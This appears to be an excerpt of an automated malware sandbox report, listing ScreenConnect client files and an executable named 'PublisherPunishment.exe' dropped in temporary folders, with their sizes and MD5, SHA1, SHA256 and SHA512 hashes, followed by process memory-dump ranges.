              • C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsBackstageShell.exe

                Filesize

                59KB

                MD5

                10dba57f22a6ab4039330000570f39f8

                SHA1

                b8b5c65a89256177da802c4c9cbd11b013221730

                SHA256

                9bd8d15759f83d99edd1f2617d59a94e1c2bb4bd7c4977958f5d5f22c5a7c469

                SHA512

                38230b63a4630145608f619d75ca3115c05ab0338fb57566e012df1bd157123a670a37ae0fea92351ab7352319a5af29f9db3f8bb14962f3f0de3a4f5a5b754c

              • C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe

                Filesize

                573KB

                MD5

                5dec65c4047de914c78816b8663e3602

                SHA1

                8807695ee8345e37efec43cbc0874277ed9b0a66

                SHA256

                71602f6b0b27c8b7d8ad624248e6126970939effde785ec913ace19052e9960e

                SHA512

                27b5dcb5b0aeadf246b91a173d06e5e8d6cf2cd19d86ca358e0a85b84cd9d8f2b26372ef34c3d427f57803d90f2e97cf59692c80c268a71865f08fc0e7ce42d1

              • C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe.config

                Filesize

                266B

                MD5

                728175e20ffbceb46760bb5e1112f38b

                SHA1

                2421add1f3c9c5ed9c80b339881d08ab10b340e3

                SHA256

                87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

                SHA512

                fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

              • C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe.genman

                Filesize

                2KB

                MD5

                efa59a7f55af829c3974a02f30ebe80c

                SHA1

                0faba6763d910d5ee104e3457045c63ccc5bf79b

                SHA256

                3e2d5cc7867afa23663d5894127ce6e2880d3075773a249b37576eda5088875a

                SHA512

                72262b09c21dc4a2b2701a5b32c149349fa3107035d5a115eac4335e3961dcf12a7a867aeff595c13aa618ea955b604538c0f4e529cb6a76fff0cb75927cc74d

              • C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsClient.exe.manifest

                Filesize

                17KB

                MD5

                f4b84e283123b025a90bbde33e2080fd

                SHA1

                cc57bfd02228be76c6e08bde16996fa992ff0e54

                SHA256

                93f9eb492b6952d8c7aa1ef1ee5a901234ba1fd2d5ef58d24e1faef597ea8e02

                SHA512

                abc92965bf97c37a614b556d2219d06e63687777d79df5ffb4b5d447dd138c160e5a45cab76a2353d758ad62960f2e58745f0523881ff6c0ea4ccbcd7ed40002

              • C:\Users\Admin\AppData\Local\Temp\Deployment\LZTW4BAZ.5VP\GKVRKHQ5.W15\ScreenConnect.WindowsFileManager.exe

                Filesize

                79KB

                MD5

                c333d3a6eeb74e4d76c3b9e0f6bfd04c

                SHA1

                a39e2643e8dbd2097829e0b08938726557cb8e36

                SHA256

                998d7a0cd6b1a837489e55e99cb992088b9fde220a1025346a461849e1f50d22

                SHA512

                58cc7741ebe1aada93fd82a3e0a571a9a1aa3e400c46e7cdddef876d74f4fbbcbae4293ac556b3823e8dc977e7ce72337a16c2d48eab0aa52b736412ae43c634

              • C:\Users\Admin\AppData\Local\Temp\Deployment\XL1312AL.YNE\9Y9V2P82.6NQ.application

                Filesize

                110KB

                MD5

                75f072db717adf065f2d4ddd705a2d49

                SHA1

                8165093de1c610b4cd5b301a6237e923170618c2

                SHA256

                3c7dd342a48bdacb6cc05c422ae960d7baf899593c7a14a075c70f478f17825c

                SHA512

                ae29ecd9cd13694075681790b909edf50903aa3820cf278889574969d2d954e1001f0bd89da6d4670bc08cbf0cdfcbd2cfc6ffc27e3bd16e0a6f1fc3f73c1517

              • C:\Users\Admin\Documents\ConnectWiseControl\Temp\PublisherPunishment.exe

                Filesize

                686KB

                MD5

                0b637cec0fa710f205a5fd5923db79dd

                SHA1

                aa41d27a3e61a3c5fbc4688c847c7fb21cb0d5ed

                SHA256

                f1ef824f1ebe8a26255aa043f73265f5d8aaaf1643a0fda50a1640de3287f80a

                SHA512

                6b86c61acd9e872beba9e7f0437720a1f846af7387817011d6a996bc19782f37229aeafab7715a8985b04f8dc2b0a35a0bfe7683ff08cf4bef78645f794b1cca

              • memory/704-394-0x0000000001030000-0x0000000001046000-memory.dmp

                Filesize

                88KB

              • memory/1640-441-0x0000000000BE0000-0x0000000000BF6000-memory.dmp

                Filesize

                88KB

              • memory/1640-447-0x0000000007050000-0x000000000706E000-memory.dmp

                Filesize

                120KB

              • memory/1640-446-0x0000000006F30000-0x0000000006F6E000-memory.dmp

                Filesize

                248KB

              • memory/1640-445-0x0000000006FB0000-0x0000000007026000-memory.dmp

                Filesize

                472KB

              • memory/1640-444-0x00000000064C0000-0x0000000006526000-memory.dmp

                Filesize

                408KB

              • memory/1640-443-0x0000000006420000-0x00000000064BC000-memory.dmp

                Filesize

                624KB

              • memory/1640-442-0x00000000057A0000-0x00000000057AA000-memory.dmp

                Filesize

                40KB

              • memory/1892-7-0x0000020E4E110000-0x0000020E4E160000-memory.dmp

                Filesize

                320KB

              • memory/1892-38-0x0000020E4E910000-0x0000020E4EABA000-memory.dmp

                Filesize

                1.7MB

              • memory/1892-32-0x0000020E4C140000-0x0000020E4C1D4000-memory.dmp

                Filesize

                592KB

              • memory/1892-1-0x00007FFE30D23000-0x00007FFE30D25000-memory.dmp

                Filesize

                8KB

              • memory/1892-44-0x0000020E4C130000-0x0000020E4C1B8000-memory.dmp

                Filesize

                544KB

              • memory/1892-22-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

                Filesize

                10.8MB

              • memory/1892-438-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

                Filesize

                10.8MB

              • memory/1892-4-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

                Filesize

                10.8MB

              • memory/1892-50-0x0000020E4BFA0000-0x0000020E4BFD6000-memory.dmp

                Filesize

                216KB

              • memory/1892-3-0x00007FFE30D20000-0x00007FFE317E1000-memory.dmp

                Filesize

                10.8MB

              • memory/1892-57-0x0000020E4BF60000-0x0000020E4BF76000-memory.dmp

                Filesize

                88KB

              • memory/1892-2-0x0000020E4A6C0000-0x0000020E4A846000-memory.dmp

                Filesize

                1.5MB

              • memory/1892-0-0x0000020E300A0000-0x0000020E300A8000-memory.dmp

                Filesize

                32KB

              • memory/1892-437-0x00007FFE30D23000-0x00007FFE30D25000-memory.dmp

                Filesize

                8KB

              • memory/1928-340-0x0000000000110000-0x00000000001A4000-memory.dmp

                Filesize

                592KB

              • memory/1940-382-0x0000000004A40000-0x0000000004FE4000-memory.dmp

                Filesize

                5.6MB

              • memory/1940-381-0x00000000042E0000-0x000000000448A000-memory.dmp

                Filesize

                1.7MB

              • memory/1940-387-0x0000000004490000-0x0000000004522000-memory.dmp

                Filesize

                584KB

              • memory/1940-386-0x00000000041D0000-0x0000000004206000-memory.dmp

                Filesize

                216KB

              • memory/1940-383-0x0000000004180000-0x00000000041D0000-memory.dmp

                Filesize

                320KB

              • memory/4444-369-0x0000000004B70000-0x0000000004BF8000-memory.dmp

                Filesize

                544KB

              • memory/4444-364-0x0000000004A40000-0x0000000004A56000-memory.dmp

                Filesize

                88KB